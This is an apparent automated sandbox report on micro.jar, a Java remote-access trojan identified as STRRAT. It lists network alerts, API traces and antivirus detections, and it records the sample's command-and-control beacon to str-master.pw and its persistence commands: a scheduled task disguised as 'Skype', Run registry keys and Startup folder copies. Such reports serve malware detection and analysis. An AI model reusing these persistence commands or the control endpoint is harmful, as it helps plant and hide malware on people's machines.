Summary | ZeroBOX

micro.jar

NPKI UPX Malicious Library Malicious Packer PE File DLL OS Processor Check PE32
Category FILE
Machine s1_win7_x6402
Started Oct. 19, 2021, 9:18 a.m.
Completed Oct. 19, 2021, 9:49 a.m.
Size 102.5KB
Type Java archive data (JAR)
MD5 b2097471ac7d4e8304a119e815ac5261
SHA256 c4acaaf51b789c246dc51d925ee92f8e0af9019da7385b8b4b127fca43fbb81d
CRC32 22A962A3
ssdeep 1536:ddAewzYpcmCIE7/d8CC9odgo08E1fl3VLIjo1S8mfaEh7FT8VYclwDu2d:zAewzChPWC9oqoENIGS7LNFTPcu6u
Yara None matched

IP Address Status Action
147.182.174.188 Active Moloch
151.101.24.209 Active Moloch
164.124.101.2 Active Moloch
173.209.48.226 Active Moloch
185.199.109.154 Active Moloch
52.78.231.108 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49165 -> 151.101.24.209:443 2028375 ET JA3 Hash - Possible Malware - Java Based RAT Unknown Traffic
TCP 192.168.56.102:49164 -> 52.78.231.108:443 2028375 ET JA3 Hash - Possible Malware - Java Based RAT Unknown Traffic
TCP 192.168.56.102:49166 -> 151.101.24.209:443 2028375 ET JA3 Hash - Possible Malware - Java Based RAT Unknown Traffic
TCP 192.168.56.102:49167 -> 151.101.24.209:443 2028375 ET JA3 Hash - Possible Malware - Java Based RAT Unknown Traffic
TCP 192.168.56.102:49168 -> 185.199.109.154:443 2028375 ET JA3 Hash - Possible Malware - Java Based RAT Unknown Traffic
UDP 192.168.56.102:64472 -> 164.124.101.2:53 2016778 ET DNS Query to a *.pw domain - Likely Hostile Potentially Bad Traffic
UDP 192.168.56.102:54322 -> 164.124.101.2:53 2028756 ET POLICY DNS Query to DynDNS Domain *.workisboring .com Potentially Bad Traffic
TCP 192.168.56.102:49180 -> 147.182.174.188:80 2030359 ET MALWARE STRRAT Initial HTTP Activity Malware Command and Control Activity Detected
TCP 192.168.56.102:49180 -> 147.182.174.188:80 2016777 ET INFO HTTP Request to a *.pw domain Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint

TLS 1.2 192.168.56.102:49165 -> 151.101.24.209:443
Issuer: C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA H2 2021
Subject: CN=repo1.maven.org
Fingerprint: e2:ba:c2:7f:d9:98:22:e2:6b:cb:17:2c:c0:15:62:76:df:a3:21:b0

TLS 1.2 192.168.56.102:49164 -> 52.78.231.108:443
Issuer: C=US, O=DigiCert, Inc., CN=DigiCert High Assurance TLS Hybrid ECC SHA256 2020 CA1
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com
Fingerprint: 84:63:b3:a9:29:12:cc:fd:1d:31:47:05:98:9b:ec:13:99:37:d0:d7

TLS 1.2 192.168.56.102:49166 -> 151.101.24.209:443
Issuer: C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA H2 2021
Subject: CN=repo1.maven.org
Fingerprint: e2:ba:c2:7f:d9:98:22:e2:6b:cb:17:2c:c0:15:62:76:df:a3:21:b0

TLS 1.2 192.168.56.102:49167 -> 151.101.24.209:443
Issuer: C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA H2 2021
Subject: CN=repo1.maven.org
Fingerprint: e2:ba:c2:7f:d9:98:22:e2:6b:cb:17:2c:c0:15:62:76:df:a3:21:b0

TLS 1.2 192.168.56.102:49168 -> 185.199.109.154:443
Issuer: C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=www.github.com
Fingerprint: 70:94:de:dd:e6:c4:69:48:3a:92:70:a1:48:56:78:2d:18:64:e0:b7

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleA

buffer: ################################################ # # # ## # # ## ### ### ## ### # # # # # # # # # # # # # # # # ### # # ### # # # ## # # # # # ### ### # # # ### # # ### # # # # Obfuscation by Allatori Obfuscator v7.3 DEMO # # # # http://www.allatori.com # # # ################################################
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Starting Download
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Waiting for dependency
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

exception.instruction_r: 8b 06 8d b5 f8 00 00 00 c5 fe 7f 06 c5 fe 7f 7e
exception.instruction: mov eax, dword ptr [esi]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x2750202
registers.esp: 4323896
registers.edi: 1
registers.eax: 6
registers.ebp: 1937757376
registers.edx: 0
registers.ebx: 133120
registers.esi: 0
registers.ecx: 3405691582
1 0 0

__exception__

stacktrace:
0x2898d28
0x27544e0
0x27544e0
0x27544e0
0x27544e0
0x27544e0
0x2754854
0x2754854
0x2754854
0x289b5e4
0x27544e0
0x27544e0
0x27544e0
0x289b584
0x2754854
0x2754889
0x2750697
JVM_GetThreadStateNames+0x4d395 _JVM_EnqueueOperation@20-0x6191b jvm+0x15af45 @ 0x735caf45
_JVM_FindSignal@4+0x6402e ??_7DCmdFactory@@6B@-0xa2d06 jvm+0x2213ae @ 0x736913ae
JVM_GetThreadStateNames+0x4d42e _JVM_EnqueueOperation@20-0x61882 jvm+0x15afde @ 0x735cafde
JVM_GetThreadStateNames+0x4d5b6 _JVM_EnqueueOperation@20-0x616fa jvm+0x15b166 @ 0x735cb166
JVM_GetThreadStateNames+0x4d627 _JVM_EnqueueOperation@20-0x61689 jvm+0x15b1d7 @ 0x735cb1d7
jio_printf+0x9f _JVM_StartThread@8-0x11 jvm+0xff36f @ 0x7356f36f
JVM_GetThreadStateNames+0x70080 _JVM_EnqueueOperation@20-0x3ec30 jvm+0x17dc30 @ 0x735edc30
JVM_GetThreadStateNames+0x708fa _JVM_EnqueueOperation@20-0x3e3b6 jvm+0x17e4aa @ 0x735ee4aa
_JVM_FindSignal@4+0x5b46 ??_7DCmdFactory@@6B@-0x1011ee jvm+0x1c2ec6 @ 0x73632ec6
_endthreadex+0x3a _beginthreadex-0xab msvcr100+0x5c556 @ 0x73f9c556
_endthreadex+0xe4 _beginthreadex-0x1 msvcr100+0x5c600 @ 0x73f9c600
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5

exception.instruction_r: 85 05 00 01 46 00 8b 74 24 1c 3b d6 7c bb 8b c7
exception.instruction: test eax, dword ptr [0x460100]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x288e277
registers.esp: 369094832
registers.edi: 254
registers.eax: 79997864
registers.ebp: 369095068
registers.edx: 12985
registers.ebx: 0
registers.esi: 254
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x2898d28
0x27544e0
0x27544e0
0x27544e0
0x27544e0
0x27544e0
0x2754854
0x2754854
0x2754854
0x289b5e4
0x27544e0
0x27544e0
0x27544e0
0x289b584
0x2754854
0x2754889
0x2750697
JVM_GetThreadStateNames+0x4d395 _JVM_EnqueueOperation@20-0x6191b jvm+0x15af45 @ 0x735caf45
_JVM_FindSignal@4+0x6402e ??_7DCmdFactory@@6B@-0xa2d06 jvm+0x2213ae @ 0x736913ae
JVM_GetThreadStateNames+0x4d42e _JVM_EnqueueOperation@20-0x61882 jvm+0x15afde @ 0x735cafde
JVM_GetThreadStateNames+0x4d5b6 _JVM_EnqueueOperation@20-0x616fa jvm+0x15b166 @ 0x735cb166
JVM_GetThreadStateNames+0x4d627 _JVM_EnqueueOperation@20-0x61689 jvm+0x15b1d7 @ 0x735cb1d7
jio_printf+0x9f _JVM_StartThread@8-0x11 jvm+0xff36f @ 0x7356f36f
JVM_GetThreadStateNames+0x70080 _JVM_EnqueueOperation@20-0x3ec30 jvm+0x17dc30 @ 0x735edc30
JVM_GetThreadStateNames+0x708fa _JVM_EnqueueOperation@20-0x3e3b6 jvm+0x17e4aa @ 0x735ee4aa
_JVM_FindSignal@4+0x5b46 ??_7DCmdFactory@@6B@-0x1011ee jvm+0x1c2ec6 @ 0x73632ec6
_endthreadex+0x3a _beginthreadex-0xab msvcr100+0x5c556 @ 0x73f9c556
_endthreadex+0xe4 _beginthreadex-0x1 msvcr100+0x5c600 @ 0x73f9c600
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5

exception.instruction_r: 85 05 00 01 46 00 8b ca 89 7c 24 70 89 5c 24 74
exception.instruction: test eax, dword ptr [0x460100]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x2886e4d
registers.esp: 367848576
registers.edi: 2431113872
registers.eax: 4
registers.ebp: 367848988
registers.edx: 3192073229
registers.ebx: 1411854156
registers.esi: 3844164496
registers.ecx: 1
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 06 8d b5 f8 00 00 00 c5 fe 7f 06 c5 fe 7f 7e
exception.instruction: mov eax, dword ptr [esi]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25e0202
registers.esp: 14808788
registers.edi: 1
registers.eax: 6
registers.ebp: 1935594688
registers.edx: 0
registers.ebx: 133120
registers.esi: 0
registers.ecx: 3405691582
1 0 0

__exception__

stacktrace:
0x26f3778
0x25e4854
0x25e0697
JVM_GetThreadStateNames+0x4d395 _JVM_EnqueueOperation@20-0x6191b jvm+0x15af45 @ 0x733baf45
_JVM_FindSignal@4+0x6402e ??_7DCmdFactory@@6B@-0xa2d06 jvm+0x2213ae @ 0x734813ae
JVM_GetThreadStateNames+0x4d42e _JVM_EnqueueOperation@20-0x61882 jvm+0x15afde @ 0x733bafde
JNI_GetCreatedJavaVMs+0x6f27 JNI_CreateJavaVM-0xa4f9 jvm+0xdcb97 @ 0x7333cb97
JNI_GetCreatedJavaVMs+0xf4bf JNI_CreateJavaVM-0x1f61 jvm+0xe512f @ 0x7334512f
java+0x229e @ 0xe9229e
java+0xae9f @ 0xe9ae9f
java+0xaf29 @ 0xe9af29
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5

exception.instruction_r: 89 0c 0d 00 00 d9 00 81 3d 88 82 5e 73 00 00 00
exception.instruction: mov dword ptr [ecx + 0xd90000], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x26f3597
registers.esp: 14809080
registers.edi: 14466048
registers.eax: 14800816
registers.ebp: 14809096
registers.edx: 2130553844
registers.ebx: 0
registers.esi: 0
registers.ecx: 1920
1 0 0

__exception__

stacktrace:

exception.instruction_r: 8b 06 8d b5 f8 00 00 00 c5 fe 7f 06 c5 fe 7f 7e
exception.instruction: mov eax, dword ptr [esi]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x2780202
registers.esp: 38074488
registers.edi: 1
registers.eax: 6
registers.ebp: 1931596992
registers.edx: 0
registers.ebx: 16910336
registers.esi: 0
registers.ecx: 3405691582
1 0 0

__exception__

stacktrace:
_JVM_SetVmMemoryPressure@4-0x128cd jvm+0x7273 @ 0x72e97273
_JVM_SetVmMemoryPressure@4-0x127dc jvm+0x7364 @ 0x72e97364
_JVM_GetManagementExt@4+0x51a4 AsyncGetCallTrace-0xb52bc jvm+0x206a4 @ 0x72eb06a4
_JVM_FindSignal@4+0xcc8c0 ??_7DCmdFactory@@6B@-0x3a474 jvm+0x289c40 @ 0x73119c40
_JVM_FindSignal@4+0xcd4d4 ??_7DCmdFactory@@6B@-0x39860 jvm+0x28a854 @ 0x7311a854
_JVM_FindSignal@4+0xcd628 ??_7DCmdFactory@@6B@-0x3970c jvm+0x28a9a8 @ 0x7311a9a8
_JVM_FindSignal@4+0xcd8a2 ??_7DCmdFactory@@6B@-0x39492 jvm+0x28ac22 @ 0x7311ac22
_JVM_GetManagementExt@4+0x5519a AsyncGetCallTrace-0x652c6 jvm+0x7069a @ 0x72f0069a
_JVM_GetManagementExt@4+0x5594f AsyncGetCallTrace-0x64b11 jvm+0x70e4f @ 0x72f00e4f
JVM_GetThreadStateNames+0x70080 _JVM_EnqueueOperation@20-0x3ec30 jvm+0x17dc30 @ 0x7300dc30
JVM_GetThreadStateNames+0x708fa _JVM_EnqueueOperation@20-0x3e3b6 jvm+0x17e4aa @ 0x7300e4aa
_JVM_FindSignal@4+0x5b46 ??_7DCmdFactory@@6B@-0x1011ee jvm+0x1c2ec6 @ 0x73052ec6
_endthreadex+0x3a _beginthreadex-0xab msvcr100+0x5c556 @ 0x74b7c556
_endthreadex+0xe4 _beginthreadex-0x1 msvcr100+0x5c600 @ 0x74b7c600
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5

exception.instruction_r: c7 04 08 01 00 00 00 5d c3 cc cc 83 3d 68 80 21
exception.instruction: mov dword ptr [eax + ecx], 1
exception.exception_code: 0xc0000005
exception.symbol: _JVM_SetVmMemoryPressure@4-0x1293b jvm+0x7205
exception.address: 0x72e97205
registers.esp: 367391736
registers.edi: 14568544
registers.eax: 1408
registers.ebp: 367391736
registers.edx: 14940312
registers.ebx: 14625792
registers.esi: 14625792
registers.ecx: 8650752
1 0 0
request GET http://str-master.pw/strigoi/server/ping.php?lid=EX1S-4U37-B1T8-TB2H-0ITG
domain str-master.pw description Palau domain TLD
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 163840
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02750000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02778000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02780000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02788000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02790000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02798000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027d0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027d8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02800000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02808000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02810000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02818000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02820000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02828000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02830000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02838000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02840000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02848000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02850000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02858000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02860000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02868000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02870000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02878000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02880000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02888000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02890000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02898000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 163840
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025e0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02608000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02610000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02618000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02620000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02628000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02630000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02638000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02640000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02648000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02650000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\jna--877171118\jna2477946155262815302.dll
file C:\Users\test22\AppData\Local\Temp\jna--877171118\jna1049267807408521846.dll
cmdline cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"
cmdline schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"
file C:\Users\test22\AppData\Local\Temp\jna--877171118\jna2477946155262815302.dll
file C:\Users\test22\AppData\Local\Temp\jna--877171118\jna4115874404283386990.dll
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 65536
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x16200000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 28
family: 0
1 0 0
cmdline cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"
cmdline schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"
host 173.209.48.226
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\micro reg_value "C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe" -jar "C:\Users\test22\AppData\Roaming\micro.jar"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\micro reg_value "C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe" -jar "C:\Users\test22\AppData\Roaming\micro.jar"
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\micro.jar
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\micro.jar
cmdline cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"
cmdline schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\test22\AppData\Roaming\micro.jar"
MicroWorld-eScan Trojan.Java.Agent.BPM
Arcabit Trojan.Java.Agent.BPM
Cyren Java/Agent.BLN
ESET-NOD32 multiple detections
BitDefender Trojan.Java.Agent.BPM
NANO-Antivirus Exploit.Zip.Heuristic-java.csrvpr
Ad-Aware Trojan.Java.Agent.BPM
Emsisoft Trojan.Java.Agent.BPM (B)
DrWeb Java.Siggen.498
FireEye Trojan.Java.Agent.BPM
Ikarus Exploit.JAVA.SpyAgent
GData Java.Backdoor.StrRat.C
Avira EXP/JAVA.Banload.VPB.Gen
Cynet Malicious (score: 99)
MAX malware (ai score=89)
file C:\Users\test22\AppData\Local\Temp\jna--877171118\jna2477946155262815302.dll
file C:\Users\test22\AppData\Local\Temp\jna--877171118\jna1049267807408521846.dll
dead_host 173.209.48.226:5050